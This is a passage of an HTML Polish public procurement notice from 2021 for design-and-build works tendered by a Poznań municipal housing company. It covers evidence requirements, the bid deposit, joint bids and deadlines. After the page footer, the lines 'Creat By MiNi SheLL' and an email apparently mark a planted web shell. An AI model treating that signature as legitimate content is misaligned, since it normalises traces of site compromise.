wszczęcia tej procedury.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w <br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia <br/>podmiotowych środków dowodowych:<br/>na potwierdzenie spełniania warunków udziału w postępowaniu:<br/>1) wykaz usług wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest <br/>krótszy - w tym okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz <br/>których usługi zostały wykonane wraz z dowodami określającymi, czy te usługi zostały wykonane <br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone <br/>przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn <br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy -<br/>wzór wykazu usług stanowi załącznik nr 6 do SWZ,<br/>2) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres <br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty <br/>i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz <br/>załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy <br/>czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, <br/>na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych <br/>od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty - wzór wykazu <br/>robót budowlanych stanowi załącznik nr 10 do SWZ,<br/>3) oświadczenia Wykonawcy o dysponowaniu w czasie trwania umowy osobami zdolnymi do <br/>wykonania zamówienia – wzór oświadczenia stanowi załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> WRAZ Z OFERTĄ WYKONAWCA JEST ZOBOWIĄZANY ZŁOŻYĆ:<br/>2) oświadczenia, o których mowa w Rozdziale VIII pkt 1 SWZ - załącznik nr 2 i nr 3<br/>do SWZ;<br/>3) zobowiązanie podmiotu trzeciego (załącznik nr 4 do SWZ) oraz oświadczenia podmiotu <br/>udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz <br/>odpowiednio spełnienia warunków udziału w postępowaniu, o których mowa w Rozdziale VIII pkt <br/>1 SWZ - załącznik nr 2 i nr 3 do SWZ lub inny podmiotowy środek dowodowy na okoliczność <br/>zobowiązania podmiotu trzeciego (jeżeli dotyczy);<br/>4) oryginał dowodu wniesienia wadium (w przypadku wadium złożonego w formie poręczeń lub <br/>gwarancji);<br/>5) dokumenty, z których wynika prawo do podpisania oferty lub odpowiednie pełnomocnictwa (jeżeli <br/>dotyczy);<br/>6) dokument stwierdzający ustanowienie przez wykonawców wspólnie ubiegających się o zamówienie <br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy).<br/>7) w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, z którego wynika, które roboty/usługi wykonają poszczególni wykonawcy (w zakresie, o którym mowa w Rozdziale VI pkt 4 SWZ) - załącznik nr 5 do SWZ (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca przystępujący do postępowania jest zobowiązany do zabezpieczenia oferty wadium <br/>w wysokości: 1 800,00 zł (słownie: jeden tysiąc osiemset zł 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu <br/>terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 <br/>ustawy PZP.<br/>3. Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy PZP.<br/>4. Wadium wnoszone w pieniądzu należy wnieść przelewem na rachunek bankowy Zamawiającego: ING <br/>Bank Śląski 07 1050 1520 1000 0023 4950 8511. W tytule przelewu prosimy dodatkowo powołać się na <br/>nr przedmiotowego postępowania: „Wadium dot. ZP.201.35.2021”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania na <br/>rachunku bankowym Zamawiającego (wadium musi wpłynąć na wskazany rachunek bankowy <br/>Zamawiającego najpóźniej przed upływem terminu składania ofert) <br/>W przypadku wpłacania wadium w formie pieniężnej, prosimy o podanie w ofercie numeru konta, <br/>na które ma zostać zwrócone wadium po rozstrzygnięciu przetargu!<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji należy załączyć do oferty w oryginale w postaci <br/>dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę <br/>dokumentu i powinno zawierać co najmniej następujące elementy:<br/>− nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (Zamawiającego), <br/>gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub <br/>poręczeniu powinien być: Zarząd Komunalnych Zasobów Lokalowych sp. z o. o., <br/>z siedzibą w Poznaniu, ul. Matejki 57.<br/>− określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>− kwotę gwarancji/poręczenia,<br/>− termin ważności gwarancji/poręczenia,<br/>− bezwarunkowe, nieodwołalne, zobowiązanie gwaranta do zapłacenia pełnej kwoty <br/>gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego, w okolicznościach określonych <br/>w art. 98 ust. 6 ustawy PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy<br/>w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w Rozdziale VIII pkt 1 SWZ składa z ofertą każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, w jakim każdy z<br/>Wykonawców wykazuje spełnianie warunków udziału w postępowaniu,<br/>b) w przypadku, o którym mowa w Rozdziale VI pkt 4 SWZ wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty/usługi<br/>wykonają poszczególni wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 5<br/>do SWZ.<br/>c) Wykonawcy zobowiązani są na wezwanie Zamawiającego, złożyć podmiotowe środki<br/>dowodowe, o których mowa w Rozdziale VIII pkt 2 SWZ, przy czym podmiotowe środki<br/>dowodowe, o których mowa:<br/>- w ppkt. 2.2. SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą<br/>spełnienie warunku udziału w postępowaniu,<br/>- w ppkt. 2.1. SWZ składa każdy z Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia.<br/>3. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art. 454-455 PZP oraz zapisów Projektowanych postanowień umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Ofertę wraz z załącznikami należy złożyć za pośrednictwem „Formularza do złożenia oferty” dostępnego na Platformie zakupowej pod adresem: https://platformazakupowa.pl/pn/zkzl_poznan</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-06 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-04</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia w terminie 100 dni, w tym:<br/>a) 30 dni w zakresie wykonania Dokumentacji oraz uzyskania warunków, uzgodnień i pozwoleń licząc od <br/>dnia zawarcia Umowy, z zastrzeżeniem, iż złożenie Zamawiającemu tej części Dokumentacji powinno <br/>nastąpić nie później niż 7 dni przed upływem tego terminu,<br/>b) pełnienia Nadzoru autorskiego – od dnia protokolarnego przekazania terenu robót do dnia podpisania <br/>Protokołu Odbioru Końcowego Robót,<br/>c) w zakresie wykonania robót, oraz sporządzenia Dokumentacji Powykonawczej – 70 dni, licząc od dnia <br/>protokolarnego przekazania terenu robót, z zastrzeżeniem, że termin na zgłoszenie Zamawiającemu <br/>gotowości do końcowego odbioru robót i przekazanie Dokumentacji Powykonawczej winno nastąpić nie <br/>później niż 7 dni przed upływem tego terminu.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-16 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com